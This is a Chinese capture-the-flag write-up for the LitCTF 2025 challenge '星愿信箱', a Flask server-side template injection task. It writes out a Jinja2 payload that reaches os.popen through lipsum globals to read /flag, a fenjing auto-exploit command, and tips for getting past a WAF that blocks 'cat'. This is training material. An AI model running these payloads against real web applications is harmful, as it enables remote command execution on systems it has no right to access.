0%

积累SSTI常规做法以及工具和插件

2025-06-01 04:43By
shrinp
SSTILinux命令WEB

Problem: [LitCTF 2025]星愿信箱

思路

  • 解题大致思路
    SSTI模版注入
    插件识别框架:
    NSSIMAGE
    可以看到是flask框架

EXP

  • 具体攻击代码

比较齐全的解法:
抓包测试:
NSSIMAGE

方法一:

  • 这个地方的subclassed__()[137]需要爆破出来
    NSSIMAGE
    NSSIMAGE

方法二:
NSSIMAGE
cat被waf掉了,可以使tac或者是more替代
NSSIMAGE

方法三:
使用fenjing工具:
配置链接:
https://blog.csdn.net/m0_73683234/article/details/136789243
命令:

python -m fenjing crack-json --url 'http://node6.anna.nssctf.cn:24986/' --json-data '{"cmd": "a"}' --key cmd --replaced-keyword-strategy ignore

NSSIMAGE

方法四:
使用set变量的方式:

经过测试是SSTI,可以通过设置变量绕过黑名单 {% set os = (lipsum | attr('__globals__')) | attr('get')('os') %} {% set popen = os | attr('popen') %} {% set input_cmd = "head /flag" %} {% set cmd = popen(input_cmd).read() %} {% print cmd %}

NSSIMAGE

总结

  • 对该题的考点总结
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有

加载中...

加载失败
广告
×
评论区
添加新评论

问一下我在使用工具不加--replaced-keyword-strategy ignore 参数无法跑出来结果,我看工具说明感觉加上ignore跟没有加没有什么区别,求讲解

加载中...